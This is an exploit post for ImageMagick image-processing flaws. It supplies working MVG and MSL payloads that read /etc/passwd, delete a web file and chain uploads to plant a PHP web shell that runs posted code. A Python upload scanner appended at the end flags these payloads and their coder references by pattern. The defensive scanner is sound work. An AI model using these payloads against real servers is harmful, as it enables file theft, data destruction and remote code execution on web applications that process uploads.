Credit to @CrazedSec for original paper, ID 4698
ImageMagick is vulnerable to a variety of attacks that allow reading, deleting,
and writing files.
Here are some useful tricks to complement the fill 'url()' vulnerability
described by @CrazedSec.
@air
== 1 ==
It's possible to read arbitrary files from a web server by uploading an
ImageMagick Vector Graphics file (MVG) that the web application processes with
ImageMagick:
push graphic-context
viewbox 0 0 1024 1024
image over 0,0 0,0 'label:@/etc/passwd'
pop graphic-context
As is the case with all of these vulnerabilities, the file doesn't need to be
uploaded with a .mvg extension. You can change it to .png, .jpg, or anything
else.
If the file doesn't exist, you'll see the @ symbol plus the filename as the
output.
== 2 ==
You can use a similar technique to delete a file, provided ImageMagick is built
with support for its ephemeral protocol:
push graphic-context
viewbox 0 0 1024 1024
image over 0,0 0,0 'ephemeral:/var/www/index.php'
pop graphic-context
== 3 ==
You can move files around, provided you're able to determine the location of
uploaded files. This can be used to upload new files as well as overwrite
existing files.
first_image.png:
<?xml version="1.0" encoding="UTF-8"?>
<image>
<read filename="/var/www/uploads/second_image.png"/>
<write filename="/var/www/hi.php"/>
</image>
second_image.png:
push graphic-context
viewbox 0 0 1024 1024
image over 0,0 0,0 'label:<?php if($_SERVER["REQUEST_METHOD"]=="POST")eval(file_get_contents("php://input")); ?>'
pop graphic-context
third_image.png:
push graphic-context
viewbox 0 0 1024 1024
image over 0,0 0,0 'msl:/var/www/uploads/first_image.png'
pop graphic-context
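A defender-side check for the point made above that these payloads work under any extension: an added Python example, not part of the original post, that compares an upload's bytes against the signature its extension claims, flags MVG/MSL text, and reports references to the label:@, ephemeral:, msl: and url( coders. The file names, sample bytes and allow-list are constructed for the example.

```python
import re

# Constructed allow-list of raster formats an upload endpoint intends to accept, by magic bytes.
MAGIC = {
    "png": b"\x89PNG\r\n\x1a\n",
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "gif": b"GIF8",
}

# Text markers of ImageMagick's scriptable formats (MVG, MSL) and the coders used in the payloads above.
TEXT_FORMAT_MARKERS = (b"push graphic-context", b"viewbox ", b"<image>", b"<read ", b"<write ")
CODER_PATTERN = re.compile(rb"(?i)\b(label:@|ephemeral:|msl:|url\()")


def inspect_upload(name, data):
    """Return the reasons an upload should be rejected; an empty list means it passed."""
    reasons = []
    ext = name.rsplit(".", 1)[-1].lower() if "." in name else ""
    expected = MAGIC.get(ext)
    if expected is None:
        reasons.append(f"extension '{ext}' is not on the allow-list")
    elif not data.startswith(expected):
        # Extension claims a raster image but the bytes do not: ImageMagick sniffs the real format.
        reasons.append(f"header does not match the {ext} signature")
    if any(marker in data[:512] for marker in TEXT_FORMAT_MARKERS):
        reasons.append("content is MVG/MSL text, not a raster image")
    hit = CODER_PATTERN.search(data)
    if hit:
        # Deliberately scans the whole file; a coder reference inside a comment is worth a look too.
        reasons.append(f"references ImageMagick coder {hit.group(1).decode()!r}")
    return reasons


# Constructed samples: a genuine PNG header and the three shapes of payload described above.
SAMPLES = {
    "photo.png": MAGIC["png"] + b"\x00" * 16,
    "first_image.png": b'<?xml version="1.0"?>\n<image>\n<read filename="/tmp/x.png"/>\n</image>\n',
    "second_image.png": b"push graphic-context\nviewbox 0 0 1024 1024\n"
                        b"image over 0,0 0,0 'label:@/etc/passwd'\npop graphic-context\n",
    "third_image.jpg": b"push graphic-context\nimage over 0,0 0,0 'ephemeral:/var/www/index.php'\n",
}


def scan_samples():
    """Run the check over every constructed sample and map each name to its findings."""
    return {name: inspect_upload(name, data) for name, data in SAMPLES.items()}


if __name__ == "__main__":
    for name, reasons in scan_samples().items():
        print(name, "->", reasons or ["ok"])
```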